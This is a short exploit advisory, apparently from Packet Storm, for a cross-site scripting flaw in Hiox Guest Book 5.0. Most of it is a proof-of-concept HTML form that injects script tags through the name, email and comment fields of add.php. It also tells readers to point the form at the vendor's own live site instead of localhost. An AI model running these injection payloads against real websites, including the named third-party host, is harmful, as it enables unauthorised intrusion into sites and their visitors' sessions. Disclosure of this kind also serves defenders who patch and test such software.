Hiox Guest Book version 5.0 suffers from a cross site scripting vulnerability.
7d3cf1111c33a481e8bf5055f4fb2f89af8fa2389636226574df3f4d7f5ba67a#############################################################################
# Exploit Title : HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scripting
# Author : JoKeR_StEx
# Tested On : Windows
# Download Software Link : www.hscripts.com/scripts/php/downloads/HGB.zip
# Date : 03/01/2014
#############################################################################
[+] P.O.C
<form action="http://127.0.0.1/HGB/add.php" method="POST">
<!--In Name -->
<input type="hidden" name="name1" value=""><script>prompt('JoKeR_StEx')</script>">
<!-- In Email -->
<input type="hidden" name="email" value=""><script>prompt('xss (email)')</script>">
<!-- in comment -->
<input type="hidden" name="cmt" value=""><script>prompt('xss (comment)')</script>">
</form>
[+] For test The Exploit (Example)
ex:http://www.hscripts.com/scripts/php/HGB/add.php
Just Replace http://127.0.0.1/HGB/add.php by http://www.hscripts.com/scripts/php/HGB/add.php ^___^
################################################################################
# Gr33t'z To : Asesino04 , Shield Dz , & All My Friends & All Algerians
################################################################################
email : jokerdz44@yahoo.fr
Facebook : fb.me/imadlilong.lasvegas
twitter : @JoKeR_StEx
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed